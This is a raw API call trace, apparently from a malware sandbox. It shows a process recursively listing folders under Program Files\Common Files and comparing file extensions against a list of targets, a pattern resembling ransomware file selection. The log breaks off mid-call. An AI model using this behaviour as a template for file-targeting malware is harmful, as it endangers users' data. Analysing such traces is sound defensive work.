FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*", lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1240 [0035.371] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.372] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0035.372] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*", lpFindFileData=0x33fee18 | out: lpFindFileData=0x33fee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1300 [0035.373] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33fee18 | out: lpFindFileData=0x33fee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.373] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33fee18 | out: lpFindFileData=0x33fee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd64fa49b, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="enu-dsk", cAlternateFileName="")) returned 1 [0035.374] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*", lpFindFileData=0x33feb9c | out: lpFindFileData=0x33feb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd64fa49b, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1200 [0035.374] FindNextFileW (in: hFindFile=0x3ef1200, lpFindFileData=0x33feb9c | out: lpFindFileData=0x33feb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd64fa49b, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.374] FindNextFileW (in: hFindFile=0x3ef1200, lpFindFileData=0x33feb9c | out: lpFindFileData=0x33feb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd64fa49b, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0035.374] FindClose (in: hFindFile=0x3ef1200 | out: hFindFile=0x3ef1200) returned 1 [0035.374] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fea4f8 | out: hHeap=0x570000) returned 1 [0035.374] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33fee18 | out: lpFindFileData=0x33fee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc84877a0, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc84877a0, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x3739a960, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x5b400, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSTTSFrontendENU.dll", cAlternateFileName="")) returned 1 [0035.374] FindClose (in: hFindFile=0x3ef1300 | out: hFindFile=0x3ef1300) returned 1 [0035.374] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fda4f0 | out: hHeap=0x570000) returned 1 [0035.374] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc536f5be, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc536f5be, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x36fbb600, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xa200, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSTTSCommon.dll", cAlternateFileName="")) returned 1 [0035.374] FindClose (in: hFindFile=0x3ef1240 | out: hFindFile=0x3ef1240) returned 1 [0035.374] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0035.374] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TTS20", cAlternateFileName="")) returned 0 [0035.375] FindClose (in: hFindFile=0x3ef1280 | out: hFindFile=0x3ef1280) returned 1 [0035.375] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39106c8 | out: hHeap=0x570000) returned 1 [0035.375] FindNextFileW (in: hFindFile=0x3ef11c0, lpFindFileData=0x33ff58c | out: lpFindFileData=0x33ff58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0035.375] FindClose (in: hFindFile=0x3ef11c0 | out: hFindFile=0x3ef11c0) returned 1 [0035.375] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fb24d8 | out: hHeap=0x570000) returned 1 [0035.376] FindNextFileW (in: hFindFile=0x3ef1180, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0035.376] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\*", lpFindFileData=0x33ff58c | out: lpFindFileData=0x33ff58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef11c0 [0035.381] FindNextFileW (in: hFindFile=0x3ef11c0, lpFindFileData=0x33ff58c | out: lpFindFileData=0x33ff58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.381] FindNextFileW (in: hFindFile=0x3ef11c0, lpFindFileData=0x33ff58c | out: lpFindFileData=0x33ff58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ado", cAlternateFileName="")) returned 1 [0035.381] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\ado\\*", lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1280 [0035.386] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.386] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4c91ed4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa4c91ed4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa06f97f7, ftLastWriteTime.dwHighDateTime=0x1ca03fb, nFileSizeHigh=0x0, nFileSizeLow=0x3912, dwReserved0=0x0, dwReserved1=0x0, cFileName="adojavas.inc", cAlternateFileName="")) returned 1 [0035.386] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1240 [0035.386] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.386] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a152a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2a152a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll.mui", cAlternateFileName="")) returned 1 [0035.387] FindClose (in: hFindFile=0x3ef1240 | out: hFindFile=0x3ef1240) returned 1 [0035.387] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0035.387] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6129cc5, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x6129cc5, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x80fe7780, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll", cAlternateFileName="")) returned 1 [0035.387] FindClose (in: hFindFile=0x3ef1280 | out: hFindFile=0x3ef1280) returned 1 [0035.387] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39106c8 | out: hHeap=0x570000) returned 1 [0035.387] FindNextFileW (in: hFindFile=0x3ef11c0, lpFindFileData=0x33ff58c | out: lpFindFileData=0x33ff58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf4f1c09, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xbf4f1c09, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x128ffb00, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectDB.dll", cAlternateFileName="")) returned 1 [0035.387] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\en-US\\*", lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1280 [0035.388] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.388] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb313d55, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb313d55, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x16e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wab32res.dll.mui", cAlternateFileName="")) returned 1 [0035.388] FindClose (in: hFindFile=0x3ef1280 | out: hFindFile=0x3ef1280) returned 1 [0035.388] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39106c8 | out: hHeap=0x570000) returned 1 [0035.388] FindNextFileW (in: hFindFile=0x3ef11c0, lpFindFileData=0x33ff58c | out: lpFindFileData=0x33ff58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadc", cAlternateFileName="")) returned 1 [0035.388] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\*", lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1280 [0035.394] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.394] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34c44b4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa34c44b4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa05a2bb2, ftLastWriteTime.dwHighDateTime=0x1ca03fb, nFileSizeHigh=0x0, nFileSizeLow=0x276, dwReserved0=0x0, dwReserved1=0x0, cFileName="adcjavas.inc", cAlternateFileName="")) returned 1 [0035.394] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1240 [0035.395] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.395] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9351968, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x95b44f8, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x9351968, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadcer.dll.mui", cAlternateFileName="")) returned 1 [0035.396] FindClose (in: hFindFile=0x3ef1240 | out: hFindFile=0x3ef1240) returned 1 [0035.396] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0035.396] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cac9e93, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0x2cac9e93, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0x2cac9e93, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x206, dwReserved0=0x0, dwReserved1=0x0, cFileName="handler.reg", cAlternateFileName="")) returned 1 [0035.397] FindClose (in: hFindFile=0x3ef1280 | out: hFindFile=0x3ef1280) returned 1 [0035.397] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39106c8 | out: hHeap=0x570000) returned 1 [0035.397] FindNextFileW (in: hFindFile=0x3ef11c0, lpFindFileData=0x33ff58c | out: lpFindFileData=0x33ff58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSMAPI", cAlternateFileName="")) returned 1 [0035.397] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\MSMAPI\\*", lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1280 [0035.861] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.868] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0036.208] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fbd8be5, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab41c3c, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fdc8b88, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0036.209] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x710d74af, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x710d74af, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb08f, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-background.png", cAlternateFileName="")) returned 1 [0036.209] lstrlenW (lpString="16_9-frame-background.png") returned 25 [0036.209] lstrlenW (lpString=".1cd") returned 4 [0036.209] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0036.209] lstrlenW (lpString=".3ds") returned 4 [0036.209] lstrcmpiW (lpString1=".3ds", lpString2=".png") returned -1 [0036.209] lstrlenW (lpString=".3fr") returned 4 [0036.209] lstrcmpiW (lpString1=".3fr", lpString2=".png") returned -1 [0036.209] lstrlenW (lpString=".3g2") returned 4 [0036.209] lstrcmpiW (lpString1=".3g2", lpString2=".png") returned -1 [0036.209] lstrlenW (lpString=".3gp") returned 4 [0036.209] lstrcmpiW (lpString1=".3gp", lpString2=".png") returned -1 [0036.209] lstrlenW 